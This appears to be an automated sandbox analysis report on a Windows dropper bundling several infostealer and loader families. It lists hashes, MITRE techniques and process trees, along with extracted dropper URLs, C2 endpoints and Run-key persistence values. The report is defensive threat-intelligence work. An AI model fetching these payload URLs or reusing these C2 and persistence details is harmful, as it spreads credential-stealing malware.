onlylogger | abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48

Analysis

max time kernel
97s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 00:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe
Size

4.2MB
MD5

29cba808ae55db40ce2d822c17c15edd
SHA1

389f5a4b43e542be9212804ecd077d80c3bd62c1
SHA256

abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48
SHA512

24d742c7919a733f4b07185982020a09188fd97a27f4c0a0d819665bac573da89fb3db31e343c9e89edf284c27d30ea4fa1012a491bba83a54926b6adeb87151

Score

10^/10

onlylogger raccoon redline smokeloader socelars tofsee vidar 5e952d9d2bbe82643afb1857a7befd7377f3a063 backdoor evasion infostealer loader persistence spyware stealer trojan upx vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

5e952d9d2bbe82643afb1857a7befd7377f3a063

Attributes

url4cnc
http://185.3.95.153/sbjoahera
http://185.163.204.22/sbjoahera
https://t.me/sbjoahera

rc4.plain

Signatures

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5440-254-0x0000000000070000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/5456-255-0x00000000003F0000-0x0000000000635000-memory.dmp	family_redline
behavioral2/memory/5440-260-0x0000000000070000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/5456-258-0x00000000003F0000-0x0000000000635000-memory.dmp	family_redline
behavioral2/memory/5440-280-0x0000000000070000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/5440-275-0x0000000000070000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/5456-273-0x00000000003F0000-0x0000000000635000-memory.dmp	family_redline
behavioral2/memory/5456-272-0x00000000003F0000-0x0000000000635000-memory.dmp	family_redline
behavioral2/memory/5440-264-0x0000000000070000-0x00000000003B5000-memory.dmp	family_redline
behavioral2/memory/5456-305-0x00000000003F0000-0x0000000000635000-memory.dmp	family_redline
behavioral2/memory/6352-310-0x0000000000ED0000-0x0000000001165000-memory.dmp	family_redline
behavioral2/memory/6632-329-0x0000000000CA0000-0x0000000000FD2000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4344-176-0x0000000000A90000-0x0000000000AC0000-memory.dmp	family_onlylogger
behavioral2/memory/4344-178-0x0000000000400000-0x00000000005E6000-memory.dmp	family_onlylogger
behavioral2/memory/5528-295-0x0000000000700000-0x0000000000744000-memory.dmp	family_onlylogger
behavioral2/memory/5528-297-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5472-299-0x0000000002170000-0x000000000221C000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 13 IoCs

Processes:

Files.exeKRSetp.exeFolder.exeInfo.exeFile.exeFile.exeInstall.exejg3_3uag.exepzyh.exeInstallation.exepub2.exejfiag3g_gg.exesvchost.exe

pid	process
3756	Files.exe
480	KRSetp.exe
2316	Folder.exe
1292	Info.exe
5064	File.exe
5028	File.exe
4344	Install.exe
1624	jg3_3uag.exe
4836	pzyh.exe
3556	Installation.exe
4368	pub2.exe
4768	jfiag3g_gg.exe
4360	svchost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
behavioral2/memory/1624-154-0x0000000000400000-0x0000000000648000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Files.exeFolder.exeabe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Files.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe

Loads dropped DLL 2 IoCs

Processes:

rUNdlL32.eXepub2.exe

pid process

2320 rUNdlL32.eXe
4368 pub2.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2320	rUNdlL32.eXe
4368	pub2.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

pzyh.exemsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	pzyh.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ipinfo.io
6 ipinfo.io
14 ip-api.com
250 ipinfo.io
251 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
5	ipinfo.io
6	ipinfo.io
14	ip-api.com
250	ipinfo.io
251	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5112	2320	WerFault.exe	rUNdlL32.eXe
5860	5448	WerFault.exe	7PY7Oo53u2Rn70PwKq59XjrA.exe
5064	5496	WerFault.exe	rbn5OGjd1ES7iqwntlB9YJPl.exe
6292	5528	WerFault.exe	bM3uAOAVr8YhaDD5qMIznYDZ.exe
6264	5424	WerFault.exe	g3R8G2hGETX0Dj5CSU3p4mKN.exe
4768	5448	WerFault.exe	7PY7Oo53u2Rn70PwKq59XjrA.exe
3684	5424	WerFault.exe	g3R8G2hGETX0Dj5CSU3p4mKN.exe
5168	5496	WerFault.exe	rbn5OGjd1ES7iqwntlB9YJPl.exe
6476	5528	WerFault.exe	bM3uAOAVr8YhaDD5qMIznYDZ.exe
5208	5252	WerFault.exe	493J_Ng8euItqV3N4QjQ42Gp.exe
4088	5528	WerFault.exe	bM3uAOAVr8YhaDD5qMIznYDZ.exe
1508	1708	WerFault.exe	xfaywlgv.exe
6004	5520	WerFault.exe	uhEi2aSTOEi6UEA4V7SDmSUp.exe
6440	5528	WerFault.exe	bM3uAOAVr8YhaDD5qMIznYDZ.exe
1868	5520	WerFault.exe	uhEi2aSTOEi6UEA4V7SDmSUp.exe
5268	5528	WerFault.exe	bM3uAOAVr8YhaDD5qMIznYDZ.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5168 schtasks.exe

pid	process
5168	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4992 taskkill.exe
7144 taskkill.exe

pid	process
4992	taskkill.exe
7144	taskkill.exe

Modifies registry class 3 IoCs

Processes:

Folder.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Folder.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exemsedge.exemsedge.exesvchost.exemsedge.exe

pid	process
4368	pub2.exe
4368	pub2.exe
1200	msedge.exe
1200	msedge.exe
456	msedge.exe
456	msedge.exe
4360	svchost.exe
4360	svchost.exe
228	msedge.exe
228	msedge.exe
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4368 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

228 msedge.exe
228 msedge.exe
228 msedge.exe
228 msedge.exe
228 msedge.exe

pid	process
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe
228	msedge.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

KRSetp.exeInstallation.exetaskkill.exeInfo.exe

description	pid	process
Token: SeDebugPrivilege	480	KRSetp.exe
Token: SeCreateTokenPrivilege	3556	Installation.exe
Token: SeAssignPrimaryTokenPrivilege	3556	Installation.exe
Token: SeLockMemoryPrivilege	3556	Installation.exe
Token: SeIncreaseQuotaPrivilege	3556	Installation.exe
Token: SeMachineAccountPrivilege	3556	Installation.exe
Token: SeTcbPrivilege	3556	Installation.exe
Token: SeSecurityPrivilege	3556	Installation.exe
Token: SeTakeOwnershipPrivilege	3556	Installation.exe
Token: SeLoadDriverPrivilege	3556	Installation.exe
Token: SeSystemProfilePrivilege	3556	Installation.exe
Token: SeSystemtimePrivilege	3556	Installation.exe
Token: SeProfSingleProcessPrivilege	3556	Installation.exe
Token: SeIncBasePriorityPrivilege	3556	Installation.exe
Token: SeCreatePagefilePrivilege	3556	Installation.exe
Token: SeCreatePermanentPrivilege	3556	Installation.exe
Token: SeBackupPrivilege	3556	Installation.exe
Token: SeRestorePrivilege	3556	Installation.exe
Token: SeShutdownPrivilege	3556	Installation.exe
Token: SeDebugPrivilege	3556	Installation.exe
Token: SeAuditPrivilege	3556	Installation.exe
Token: SeSystemEnvironmentPrivilege	3556	Installation.exe
Token: SeChangeNotifyPrivilege	3556	Installation.exe
Token: SeRemoteShutdownPrivilege	3556	Installation.exe
Token: SeUndockPrivilege	3556	Installation.exe
Token: SeSyncAgentPrivilege	3556	Installation.exe
Token: SeEnableDelegationPrivilege	3556	Installation.exe
Token: SeManageVolumePrivilege	3556	Installation.exe
Token: SeImpersonatePrivilege	3556	Installation.exe
Token: SeCreateGlobalPrivilege	3556	Installation.exe
Token: 31	3556	Installation.exe
Token: 32	3556	Installation.exe
Token: 33	3556	Installation.exe
Token: 34	3556	Installation.exe
Token: 35	3556	Installation.exe
Token: SeDebugPrivilege	4992	taskkill.exe
Token: SeDebugPrivilege	1292	Info.exe
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

File.exemsedge.exe

pid process

5064 File.exe
5064 File.exe
5064
5064
5064
5064
228 msedge.exe
228 msedge.exe
2060
228 msedge.exe
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

File.exe

pid process

5064 File.exe
5064 File.exe
5064
5064
5064
5064
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

File.exe

pid process

5028 File.exe

pid	process
5064	File.exe
5064	File.exe
5064
5064
5064
5064
228	msedge.exe
228	msedge.exe
2060
228	msedge.exe

pid	process
5064	File.exe
5064	File.exe
5064
5064
5064
5064

pid	process
5028	File.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exeFiles.exemsedge.exeFolder.exepzyh.exeInstallation.exemsedge.execmd.exe

description	pid	process	target process
PID 2800 wrote to memory of 3756	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Files.exe
PID 2800 wrote to memory of 3756	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Files.exe
PID 2800 wrote to memory of 3756	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Files.exe
PID 2800 wrote to memory of 480	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	KRSetp.exe
PID 2800 wrote to memory of 480	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	KRSetp.exe
PID 2800 wrote to memory of 2316	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Folder.exe
PID 2800 wrote to memory of 2316	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Folder.exe
PID 2800 wrote to memory of 2316	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Folder.exe
PID 2800 wrote to memory of 1292	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Info.exe
PID 2800 wrote to memory of 1292	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Info.exe
PID 2800 wrote to memory of 1292	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Info.exe
PID 3756 wrote to memory of 5064	3756	Files.exe	File.exe
PID 3756 wrote to memory of 5064	3756	Files.exe	File.exe
PID 3756 wrote to memory of 5064	3756	Files.exe	File.exe
PID 2800 wrote to memory of 5028	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	File.exe
PID 2800 wrote to memory of 5028	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	File.exe
PID 2800 wrote to memory of 5028	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	File.exe
PID 2800 wrote to memory of 4344	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Install.exe
PID 2800 wrote to memory of 4344	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Install.exe
PID 2800 wrote to memory of 4344	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Install.exe
PID 2800 wrote to memory of 1624	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	jg3_3uag.exe
PID 2800 wrote to memory of 1624	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	jg3_3uag.exe
PID 2800 wrote to memory of 1624	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	jg3_3uag.exe
PID 2800 wrote to memory of 4836	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	pzyh.exe
PID 2800 wrote to memory of 4836	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	pzyh.exe
PID 2800 wrote to memory of 4836	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	pzyh.exe
PID 2800 wrote to memory of 3556	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Installation.exe
PID 2800 wrote to memory of 3556	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Installation.exe
PID 2800 wrote to memory of 3556	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	Installation.exe
PID 2800 wrote to memory of 4368	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	pub2.exe
PID 2800 wrote to memory of 4368	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	pub2.exe
PID 2800 wrote to memory of 4368	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	pub2.exe
PID 2800 wrote to memory of 2224	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	msedge.exe
PID 2800 wrote to memory of 2224	2800	abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe	msedge.exe
PID 2224 wrote to memory of 4068	2224	msedge.exe	msedge.exe
PID 2224 wrote to memory of 4068	2224	msedge.exe	msedge.exe
PID 2316 wrote to memory of 2320	2316	Folder.exe	rUNdlL32.eXe
PID 2316 wrote to memory of 2320	2316	Folder.exe	rUNdlL32.eXe
PID 2316 wrote to memory of 2320	2316	Folder.exe	rUNdlL32.eXe
PID 4836 wrote to memory of 4768	4836	pzyh.exe	jfiag3g_gg.exe
PID 4836 wrote to memory of 4768	4836	pzyh.exe	jfiag3g_gg.exe
PID 4836 wrote to memory of 4768	4836	pzyh.exe	jfiag3g_gg.exe
PID 3556 wrote to memory of 4324	3556	Installation.exe	cmd.exe
PID 3556 wrote to memory of 4324	3556	Installation.exe	cmd.exe
PID 3556 wrote to memory of 4324	3556	Installation.exe	cmd.exe
PID 3756 wrote to memory of 228	3756	Files.exe	msedge.exe
PID 3756 wrote to memory of 228	3756	Files.exe	msedge.exe
PID 228 wrote to memory of 3560	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 3560	228	msedge.exe	msedge.exe
PID 4324 wrote to memory of 4992	4324	cmd.exe	taskkill.exe
PID 4324 wrote to memory of 4992	4324	cmd.exe	taskkill.exe
PID 4324 wrote to memory of 4992	4324	cmd.exe	taskkill.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe
PID 228 wrote to memory of 2652	228	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe
"C:\Users\Admin\AppData\Local\Temp\abe12a319f2aed2a1f0cea9fd173d70846c738df6139833d92e28220d2f9ed48.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2800

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3756

C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb285446f8,0x7ffb28544708,0x7ffb28544718
4⤵
PID:3560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
4⤵
PID:2652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
4⤵
PID:4084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
4⤵
PID:3896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
4⤵
PID:4844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
4⤵
PID:4824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5112 /prefetch:8
4⤵
PID:4984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
4⤵
PID:3680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
4⤵
PID:1472

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
4⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
PID:4160

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
